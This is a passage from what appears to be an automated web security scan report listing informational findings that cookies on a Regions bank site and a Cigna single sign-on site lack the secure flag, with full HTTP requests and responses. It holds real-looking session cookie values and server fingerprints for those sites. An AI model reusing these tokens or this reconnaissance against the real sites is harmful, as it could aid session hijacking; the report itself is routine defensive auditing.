User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555424020:ss=1305555424020; securebank.regions.com-https=R929786393

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT
Accept-Ranges: bytes
ETag: "08a854a4d9c61:f627"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT
Content-Length: 37697

// Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com
// Professional Validation And More v2.0.2 Level 2


var gVAM_UA = navigator.userAgent.toLowerCase();
var gVAM_OS, gV
...[SNIP]...
5.54. https://securebank.regions.com/VAM/2_0_2/VAML2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /VAM/2_0_2/VAML2.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /VAM/2_0_2/VAML2.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555424020:ss=1305555424020; securebank.regions.com-https=R929786393

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT
Accept-Ranges: bytes
ETag: "08a854a4d9c61:f627"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT
Content-Length: 5007

// Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com
// Professional Validation And More v2.0.2 Level 2


function VAM_EvalDiffCond(pCO)
{
var vVal1 = pCO.ConvVal(pCO, p
...[SNIP]...
5.55. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /VAM/2_0_2/VAM_DTTB.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /VAM/2_0_2/VAM_DTTB.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555424020:ss=1305555424020; securebank.regions.com-https=R929786393

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT
Accept-Ranges: bytes
ETag: "08a854a4d9c61:f627"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT
Content-Length: 5948

// Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com
// Professional Validation And More v2.0.2 Level 2


function VAM_ReformatInit(pAO)
{
var vFld = VAM_GetById(pAO.Con
...[SNIP]...
5.56. https://securebank.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555427736:ss=1305555424020; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: no-cache
Content-Length: 3262
Content-Type: image/x-icon
Last-Modified: Fri, 28 Sep 2007 03:41:18 GMT
Accept-Ranges: bytes
ETag: "e0921d6e811c81:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:20:22 GMT

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
5.57. https://securebank.regions.com/images/btnContinue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/btnContinue.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btnContinue.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R929786393; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555427736:ss=1305555424020

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Length: 1026
Content-Type: image/gif
Last-Modified: Mon, 19 Feb 2007 12:52:50 GMT
Accept-Ranges: bytes
ETag: "03d9adc2454c71:f627"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:09 GMT

GIF89aF......U..U.....V....g9V.U..j.$U..7W.U..9V.V........S..U..W....ET..X..6V.u.59W.V..T..8X....:W....6X...V6X.9V.......7W.^..7Y.5W....8Y....W..W..S..U..T..7X.......S..T..7V.8U.R..T..6X.Q..T..8S....S
...[SNIP]...
5.58. https://securebank.regions.com/images/equalhousing.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/equalhousing.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/equalhousing.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Length: 282
Content-Type: image/gif
Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT
Accept-Ranges: bytes
ETag: "0b7b64b4d9c61:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT

GIF89a...........//.........kjjTr.VUU......GGG.........+Gt>>=......EQf............. B...{...........&%#`n....!.......,............'.di."..,.e...%0...,.......P0*.......    E.1.%..D.$ ....blK.
...s.%.
.#..
...[SNIP]...
5.59. https://securebank.regions.com/images/green/rf_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/green/rf_logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/green/rf_logo.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Length: 4105
Content-Type: image/gif
Last-Modified: Wed, 13 Aug 2008 19:18:20 GMT
Accept-Ranges: bytes
ETag: "0e6a25879fdc81:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:05 GMT

GIF89a).8.......U..............U.................V.....W.......r....................}.....w........u......r..........A....>...i.............}_...................{.;...~.?......^....................
...[SNIP]...
5.60. https://securebank.regions.com/images/red_arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/red_arrow.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/red_arrow.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R929786393; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555427736:ss=1305555424020

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Length: 54
Content-Type: image/gif
Last-Modified: Wed, 14 Feb 2007 14:50:26 GMT
Accept-Ranges: bytes
ETag: "0a53d764750c71:f627"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:09 GMT

GIF89a........U....!.......,...........a.........p..;
5.61. https://securebank.regions.com/images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/spacer.gif HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Length: 799
Content-Type: image/gif
Last-Modified: Fri, 15 Sep 2006 20:19:50 GMT
Accept-Ranges: bytes
ETag: "0b7b64b4d9c61:e57b"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT

GIF89a..................................................................................................................................................................................................
...[SNIP]...
5.62. https://securebank.regions.com/script/regions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /script/regions.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /script/regions.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rxyjhw55ndvthz45fybes045; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Oct 2010 15:22:00 GMT
Accept-Ranges: bytes
ETag: "01c578a6a70cb1:e57b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:00 GMT
Content-Length: 8556

/**********************************************************
* *
* Copyright .2005 Corillian Corporation *
*
...[SNIP]...
5.63. https://securebank.regions.com/styles/styles.AmSouth.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /styles/styles.AmSouth.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/styles.AmSouth.css HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rxyjhw55ndvthz45fybes045; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT
Accept-Ranges: bytes
ETag: "05c773bea85ca1:e57b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:00 GMT
Content-Length: 25437

BODY
{font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;}
.pageBackground
{background-image:url(../images/page_bck.gif);
...[SNIP]...
5.64. https://securebank.regions.com/styles/stylesprint.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /styles/stylesprint.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/stylesprint.css HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rxyjhw55ndvthz45fybes045; securebank.regions.com-https=R890651000

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Sat, 26 Dec 2009 05:14:00 GMT
Accept-Ranges: bytes
ETag: "05c773bea85ca1:e57b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:01 GMT
Content-Length: 32493

BODY
{font-size:11px; font-family:Arial, Sans-Serif; color:black; margin:0px; border-collapse:collapse; text-align:left; padding:0px;}
.pageBackground
{background-image:url(../images/page_bck.gif);
...[SNIP]...
5.65. https://sso.corp.cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=84D993307FD1107FC884A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:19 GMT
Content-length: 261
Content-type: text/html
Set-Cookie: TLTHID=8C93EE5E7FD1107FC96FA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; Path=/; Domain=.cigna.com
Etag: "f2e32241-1-0-105"
Last-modified: Sun, 17 Jul 2005 20:01:07 GMT
Accept-ranges: bytes

<HTML>
<HEAD>
<META Http-Equiv="Cache-Control" Content="no-cache">
<META Http-Equiv="Pragma" Content="no-cache">
<META Http-Equiv="Expires" Content="0">
<META HTTP-EQUIV="Refresh" Content="0
...[SNIP]...
5.66. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/CIGNAforpros_logo1.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corp/sso/images/CIGNAforpros_logo1.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayId.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; JSESSIONID=0001mmeItkCv4WhFhPcFW-cezLI:13agknsul; TLTHID=92964B127FD1107FCAD3A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:39 GMT
Content-length: 4668
Content-type: image/gif
Set-Cookie: TLTHID=989F512A7FD1107FCBACA536181C0CE6; Path=/; Domain=.cigna.com
Etag: "62a2347d-1-0-123c"
Last-modified: Mon, 19 Jan 2004 19:08:58 GMT
Accept-ranges: bytes

GIF89a..:.......D...........y.................c..9.......................n.................r..Y...........................z..........H..xxx.........,........W........d.................z...........<...
...[SNIP]...
5.67. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/arrow_orange.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/arrow_orange.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:24 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "ef1cee75-1-0-3d"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA16587FD9107F089BA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

5.68. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/cigna_logo.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/cigna_logo.jpg HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:26 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "38eba70c-1-0-9ae"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA4F9C7FD9107F089FA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

5.69. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/header_forgot_ID.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/header_forgot_ID.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:32 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "7e42fb94-3-0-48c"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4A7E0907FD9107F0896A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

5.70. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/header_forgot_password.gif

Issue detail

